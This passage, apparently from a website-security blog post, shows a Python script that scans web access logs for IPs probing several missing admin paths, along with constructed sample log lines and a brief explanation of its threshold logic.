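    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Oct/2016:13:50:01 +0000] "GET /admin/ HTTP/1.1" 404 162
203.0.113.7 - - [26/Oct/2016:13:50:01 +0000] "GET /administrator/ HTTP/1.1" 404 162
203.0.113.7 - - [26/Oct/2016:13:50:02 +0000] "GET /login.php HTTP/1.1" 404 162
203.0.113.7 - - [26/Oct/2016:13:50:02 +0000] "GET /access/ HTTP/1.1" 403 150
203.0.113.7 - - [26/Oct/2016:13:50:03 +0000] "GET /index.html HTTP/1.1" 200 5120
198.51.100.20 - - [26/Oct/2016:13:52:10 +0000] "GET /login HTTP/1.1" 404 162
198.51.100.20 - - [26/Oct/2016:13:52:15 +0000] "GET /products HTTP/1.1" 200 8040
192.0.2.55 - - [26/Oct/2016:13:55:40 +0000] "GET /store-mgmt-7f3/ HTTP/1.1" 200 3011
"""


def find_admin_probers(log_text, threshold=THRESHOLD):
    """Return {client IP: sorted missing admin-like paths} for likely scanners."""
    missing = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["status"] not in ("403", "404"):
            continue  # unparsable line, or the path exists and was served
        path = m["path"].split("?", 1)[0].lower()
        segments = [s for s in path.split("/") if s]
        if any(word in seg for seg in segments for word in PROBE_WORDS):
            missing[m["ip"]].add(path)
    return {
        ip: sorted(paths) for ip, paths in missing.items() if len(paths) >= threshold
    }


if __name__ == "__main__":
    for ip, paths in find_admin_probers(SAMPLE_LOG).items():
        print(ip, "probed", paths)
```

A single mistyped URL, such as the lone `/login` request in the sample, stays below the threshold, and requests to the renamed folder never match because they return 200.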

One fact that every business owner knows and understands is that, “your reputation is everything”, therefore no cost can be too much as long as it secures your website and safeguards your reputation.

]]>